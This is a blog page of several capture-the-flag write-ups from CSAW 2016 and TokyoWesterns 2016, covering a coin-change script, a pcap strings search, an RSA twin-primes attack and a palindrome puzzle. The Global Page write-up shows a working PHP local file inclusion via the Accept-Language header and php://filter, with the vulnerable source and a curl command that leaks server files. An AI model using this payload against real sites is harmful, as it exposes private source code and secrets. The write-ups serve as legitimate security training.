Writeups

[CSAW 2016] Coinslot Writeup

Standard

Description:

#Hope #Change #Obama2008

nc misc.chal.csaw.io 8000

Let’s connect to the server and see what will happen:

[Megabeets] /tmp/CSAW/Coinslot# nc misc.chal.csaw.io 8000
$0.07
$10,000 bills: 0
$5,000 bills: 0
$1,000 bills: 0
$500 bills: 0
$100 bills: 0
...
...

So, the server is displaying a wanted amount of money and we need to calculate the number of bills and coins given the amount. All we need is writing a simple python script and a coffee break because it will take about 10 minutes for the flag to come up 🙁

from pwn import *

r = remote('misc.chal.csaw.io',8000)

# Create an array of dollars and coins values
money = [10000.0, 5000.0, 1000.0, 500.0, 100.0, 50.0, 20.0, 10.0, 5.0, 1.0, 0.5, 0.25, 0.1, 0.05, 0.01]
count = 0

while(True):
	count += 1
	amount = 0.0
	
	# Recieve the wanted amount of money
	amount = float(r.recvline()[1:])
	print "Wanted amount is " + str(amount)

	# Send the number of dollars and coins for each value
	for m in money:
		print r.recv()
		ans = int(amount/m)
		print "Sending %d" %ans
		r.sendline(str(ans))
		amount = round((amount - (ans*m)), 2)
		print "Left with " + str(amount)
	print "[+] Finished %d" %count
	print r.recvline()

 

The flag is: flag{started-from-the-bottom-now-my-whole-team-fucking-here}

megabeets_inline_logoEat Veggies

[CSAW 2016] Kill Writeup

Standard

Description:

Is kill can fix? Sign the autopsy file?
kill.pcapng

This challenge was the first in the Forensics category and was very very simple. We are given with what seems like a corrupted pcapng file, I wasn’t able to open it in Wireshark nor Tcpdump. I ran strings on it with a hope to find the flag:

[Megabeets] /tmp/CSAW/kill# strings kill.pcapng | grep -i flag
=flag{roses_r_blue_violets_r_r3d_mayb3_harambae_is_not_kill}

And to my great surprise I got it, the flag was written plain-text in the file.

megabeets_inline_logoEat Veggies

[TWCTF-2016: Web] Global Page Writeup

Standard

Challenge description: 
Welcome to TokyoWesterns’ CTF!

As I entered the challenge I faced a three items list – two links and a strikethrough word:.

I clicked the tokyo link, which was actually a GET request with a parameter named page in index.php. In response I got a page with PHP error and information from Wikipedia about Tokyo, printed in Hebrew – my mother tongue.

Warning: include(tokyo/en-US.php): failed to open stream: No such file or directory in /var/www/globalpage/index.php on line 41
Warning: include(): Failed opening ‘tokyo/en-US.php’ for inclusion (include_path=’.:/usr/share/php:/usr/share/pear’) in /var/www/globalpage/index.php on line 41

First thing to come in mind is a LFI attack, but before making any reckless time-wasting moves, let’s first figure it all out. The page uses include() to, well, include the page “en-US.php” from folder named tokyo. The page wasn’t existed so an error was thrown. I tried pages like “en.php”, “he.php” and “jp.php” and they did exist. The page “ctf” displayed similar behaviors. Seems like all the pages display their information based on the user’s or the browser’s language.

The second thing I tested was the page’s reactions to different values. I tried the value “?page=flag” and it returned the expected error:

Warning: include(flag/en-US.php): failed to open stream: No such file or directory in /var/www/globalpage/index.php on line 41
Warning: include(): Failed opening ‘flag/en-US.php’ for inclusion (include_path=’.:/usr/share/php:/usr/share/pear’) in /var/www/globalpage/index.php on line 41
Warning: include(flag/en.php): failed to open stream: No such file or directory in /var/www/globalpage/index.php on line 41
Warning: include(): Failed opening ‘flag/en.php’ for inclusion (include_path=’.:/usr/share/php:/usr/share/pear’) in /var/www/globalpage/index.php on line 41

I then understood the page was trying to include the language file and every value that I’ll set to “page” will be a folder. I tested the page with the value “../../../etc/passwd” with and without a null-byte terminator but failed due to the sanitize of dots and slashes the page performs.

But how does the page know my language? It took me a while to figure it out. The page took my language settings from the “Accept-Language” field in the request’s header. I tried to change Accept-Language to something else using a Firefox plugin called Tamper Data and it worked! Any value I’ll put there will change the requested page. For example if I request “?page=Mega” and set Accept-Language to “beets” it would return the errors:

Warning: include(Mega/beets.php): failed to open stream: No such file or directory in /var/www/globalpage/index.php on line 41
Warning: include(): Failed opening ‘Mega/beets.php’ for inclusion (include_path=’.:/usr/share/php:/usr/share/pear’) in /var/www/globalpage/index.php on line 41

I combined it all together to perform a well known LFI attack using php://filter. I set the parameter value to “php:” and the Accept-Language field to “/filter/convert.base64-encode/resource=index”. This function encodes the page with Base64 before including it. And indeed I got “index.php” encoded with base64. The decoded page looks like this:

<?php
if (!defined('INCLUDED_INDEX')) {
define('INCLUDED_INDEX', true);
ini_set('display_errors', 1);
include "flag.php";
?>
<!doctype html>
<html>
<head>
<meta charset=utf-8>
<title>Global Page</title>
<style>
.rtl {
direction: rtl;
}
</style>
</head>
<body>
<?php
$dir = "";
if(isset($_GET['page'])) {
$dir = str_replace(['.', '/'], '', $_GET['page']);
}
if(empty($dir)) {
?>
<ul>
<li><a href="/?page=tokyo">Tokyo</a></li>
<li><del>Westerns</del></li>
<li><a href="/?page=ctf">CTF</a></li>
</ul>
<?php
}
else {
foreach(explode(",", $_SERVER['HTTP_ACCEPT_LANGUAGE']) as $lang) {
$l = trim(explode(";", $lang)[0]);
?>
<p<?=($l==='he')?" class=rtl":""?>>
<?php
include "$dir/$l.php";
?>
</p>
<?php
}
}
?>
</body>
</html>
<?php
}
?>
view raw index.php hosted with ❤ by GitHub

As you can see on the top of the code there is an included page named “flag.php”. I changed the Accept-Language accordingly to “/filter/convert.base64-encode/resource=flag” and received the encoded page. Decode it to reveal the flag:

TWCTF{I_found_simple_LFI}

By the way, you can also solve it the “Curl” way:

 curl 'http://globalpage.chal.ctf.westerns.tokyo/?page=php:' -H "Accept-Language:/filter/convert.base64-encode/resource=flag"

 

megabeets_inline_logoEat Veggies.

megabeets_inline_logoEat Veggies

[TWCTF-2016: Crypto] Twin Primes Writeup

Standard

Challenge description:
Decrypt it.
twin-primes.7z

We have 4 files in the archive:

  • encrypt.py – A Python script uses RSA algorithm to encrypt the flag
  • encryped – The encrypted message
  • key 1 – n, and e of one of the keys used in the encryption process
  • key 2 – n, and e of the other key used in the encryption process

Are you ready for your math lesson? Here we go.
After reading encrypt.py we know that:

  • n1 = p*q
  • n2 (p+2)(q+2)
  • p and q are twin primesi.e p is prime and p+is also prime; similar for q.

Now let’s turn the equation into an equation with one unknown and then solve it for the unknown.We can Isolate q to be twin-primes_1  and substitute q in the other equation. Now we have an equation in one unknown:twin-primes_2

Solve the equation and you’ll get: twin-primes_3

We need to solve this quadratic equation in order to find p and q. After that it will not be a problem to find the d’s and build the keys.
The rest is in the script:

from sympy import *
from Crypto.Util.number import *
import Crypto.PublicKey.RSA as RSA
import os
# n from key1
n1 = 19402643768027967294480695361037227649637514561280461352708420192197328993512710852087871986349184383442031544945263966477446685587168025154775060178782897097993949800845903218890975275725416699258462920097986424936088541112790958875211336188249107280753661467619511079649070248659536282267267928669265252935184448638997877593781930103866416949585686541509642494048554242004100863315220430074997145531929128200885758274037875349539018669336263469803277281048657198114844413236754680549874472753528866434686048799833381542018876362229842605213500869709361657000044182573308825550237999139442040422107931857506897810951
# n from key2
n2 = 19402643768027967294480695361037227649637514561280461352708420192197328993512710852087871986349184383442031544945263966477446685587168025154775060178782897097993949800845903218890975275725416699258462920097986424936088541112790958875211336188249107280753661467619511079649070248659536282267267928669265252935757418867172314593546678104100129027339256068940987412816779744339994971665109555680401467324487397541852486805770300895063315083965445098467966738905392320963293379345531703349669197397492241574949069875012089172754014231783160960425531160246267389657034543342990940680603153790486530477470655757947009682859
# e from key1 && key2
e=long(65537)
# a,b and c of the quadratic equation
a = 2
b = n1-n2+4
c = 2*n1
x = Symbol('x')
# solve the equation and put the solutions in x1_2, one of the solutions will be p, and the other will be q
x1_2 = solve(a*x**2+b*x+c)
p = x1_2[0]
q = x1_2[1]
# create d1 and d2 form p and q
d1 = inverse(e, (p-1)*(q-1))
d2 = inverse(e, (p+1)*(q+1))
# constructs the paramter to key1 and key2
key1=RSA.construct((n1,e,d1))
key2=RSA.construct((n2,e,d2))
# decrypt the flag
encrypted_flag = open('/Megabeets/encrypted',"r").read()
long_to_bytes(key1.decrypt(key2.decrypt(encrypted_flag)))
# result: "TWCTF{3102628d7059fa267365f8c37a0e56cf7e0797ef}"
view raw twin-primes.py hosted with ❤ by GitHub

 

megabeets_inline_logoEat Veggies

[TWCTF-2016: PPC] Make a Palindrome! Writeup

Standard

Challenge description:

Your task is to make a palindrome string by rearranging and concatenating given words.

Input Format: N <Word_1> <Word_2> ... <Word_N>
Answer Format: Rearranged words separated by space.
Each words contain only lower case alphabet characters.

Example Input: 3 ab cba c
Example Answer: ab c cba

You have to connect to ppc1.chal.ctf.westerns.tokyo:31111(TCP) to answer the problem.

$ nc ppc1.chal.ctf.westerns.tokyo 31111
  • Time limit is 3 minutes.
  • The maximum number of words is 10.
  • There are 30 cases. You can get flag 1 on case 1. You can get flag 2 on case 30.
  • samples.7z Server connection examples.

This challenge was pretty simple. I used the given “example.py”  and added the following function to it:

def makepal(l):
	for b in itertools.permutations(l, len(l)):
		str1 = ''.join(b)
		if str(str1) == str(str1)[::-1]:
			print b
			return b

Then I called it using the original script structure:

answer = makepal(words)

And the server returned the flag:
TWCTF{Hiyokko_Tsuppari}

The full script can be found here.

megabeets_inline_logoEat Veggies